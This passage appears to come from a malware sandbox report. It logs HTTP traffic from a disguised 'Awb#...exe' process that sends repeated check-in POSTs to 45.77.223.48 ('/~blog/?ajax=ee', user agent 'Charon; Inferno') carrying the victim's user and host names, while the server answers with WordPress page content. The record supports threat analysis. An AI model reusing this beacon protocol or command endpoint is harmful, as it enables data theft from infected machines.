Apr 25, 2024 09:42:56.947030067 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49796	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:57.200453997 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:57.331301928 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:58.137273073 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:57 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:58.137542009 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:58.137554884 CEST	11	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: UTF-8" />
Apr 25, 2024 09:42:58.137590885 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:58.146480083 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:58.146853924 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:58.146893024 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:58.147001982 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:58.147505045 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:58.147531986 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49797	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:58.404315948 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:58.535094976 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:59.476314068 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:58 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:59.476459980 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:59.486028910 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:59.486440897 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:59.486558914 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:59.486702919 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:59.486818075 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:59.486874104 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:59.486969948 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:42:59.487020016 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49798	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:59.746040106 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:59.876717091 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:00.707429886 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:59 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:00.707573891 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:00.707585096 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:00.716109991 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:00.716623068 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:00.716753960 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:00.716891050 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:00.717068911 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:00.717113018 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:00.717204094 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49799	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:00.985732079 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:01.119400024 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:01.951961994 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:01 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:01.952116966 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 25, 2024 09:43:01.952295065 CEST	12	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 Data Ascii: lang="en-US"
Apr 25, 2024 09:43:01.952439070 CEST	25	IN	Data Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: ><head><meta charset="
Apr 25, 2024 09:43:01.952745914 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:43:01.952931881 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:43:01.953176022 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:01.963268995 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:01.963939905 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:01.964215040 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49800	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:02.240601063 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:02.368654013 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:03.218880892 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:02 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:03.218997955 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:03.219140053 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:03.228153944 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:03.228506088 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:03.228638887 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:03.228804111 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:03.228997946 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:03.229038954 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:03.229095936 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49801	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
